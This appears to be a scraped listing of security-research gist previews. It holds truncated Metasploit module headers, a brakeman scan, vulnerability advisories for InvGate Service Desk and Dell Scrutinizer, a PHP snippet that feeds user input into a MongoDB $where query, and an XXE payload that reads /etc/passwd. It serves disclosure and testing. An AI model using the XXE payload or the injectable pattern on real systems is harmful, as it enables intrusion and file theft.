This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
at Mono.CSharp.CSharpCodeCompiler.CompileFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00135] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:236 | |
at Mono.CSharp.CSharpCodeCompiler.CompileAssemblyFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00011] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:135 | |
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00014] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/System.CodeDom.Compiler/CodeDomProvider.cs:111 | |
at System.Web.Compilation.AssemblyBuilder.BuildAssembly (System.Web.VirtualPath virtualPath, System |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
require 'json' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bperry@w00den-pickle:~/tmp/discourse$ brakeman | |
WARNING: -------------------------------------------------------------------------- | |
You are running an old version of bundler, please update by running: gem install bundler | |
Loading scanner... | |
[Notice] Detected Rails 3 application | |
Processing application in /home/bperry/tmp/discourse | |
Processing gems... | |
Processing configuration... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$m = new MongoClient("mongodb://127.0.0.1:27017"); | |
$m->selectDB('foo'); | |
$collection = $m->selectCollection('test', 'phpmanual'); | |
if ($_GET["age"] != "") { | |
$js = 'function(){if(this.name == "Joe"||this.age=='.$_GET["age"].')return true;}'; | |
$cursor = $collection->find(array('$where' => $js)); | |
foreach($cursor as $doc) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
## This module requires Metasploit: http//metasploit.com/download | |
## Current source: https://github.com/rapid7/metasploit-framework | |
### | |
require 'msf/core' | |
class Metasploit4 < Msf::Auxiliary | |
Rank = GoodRanking |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?>! | |
<!DOCTYPE foo [ ! | |
<!ELEMENT foo ANY >! | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>! | |
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" | |
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http:// | |
schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://www.webserviceX.NET/" | |
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/ | |
XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http:// | |
schemas.xmlsoap.org/wsdl/http/" targetNamespace="http://www.webserviceX.NET/" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole | |
+-------------------------------------------------------+ | |
| METASPLOIT by Rapid7 | | |
+---------------------------+---------------------------+ | |
| __________________ | | | |
| ==c(______(o(______(_() | |""""""""""""|======[*** | | |
| )=\ | | EXPLOIT \ | | |
| // \\ | |_____________\_______ | | |
| // \\ | |==[msf >]============\ | | |
| // \\ | |______________________\ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
InvGate Service Desk v4.2.36 multiple vulnerabilities | |
http://www.invgate.com/en/service-desk/ | |
http://www.invgate.com/en/service-desk/on-premise-trial/ | |
Invgate Service Desk suffers from many SQL injections as an authenticated, but non-privileged | |
(end-user role) user. Most are also stacked injections, so an attacker also has the ability to | |
modify any of the data in the database. The payloads used to determine exploitability are in the | |
sqlmap payload output, but each was verified to be able to enumerate the current database, | |
current user, and an assortment of other things. These were tested with an ‘end-user’ user. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Dell Scrutinizer 11.01 several vulnerabilities | |
http://www.mysonicwall.com has a trial available. | |
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with | |
remote code execution. An attacker needs to be authenticated, but not as an administrator. | |
However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that | |
any authenticated user can change any other user’s password, including the admin. One SQL | |
injection, which a Metasploit module was provided for, requires this privilege escalation to reach | |
since it exists in the new user mechanism only available to admins. |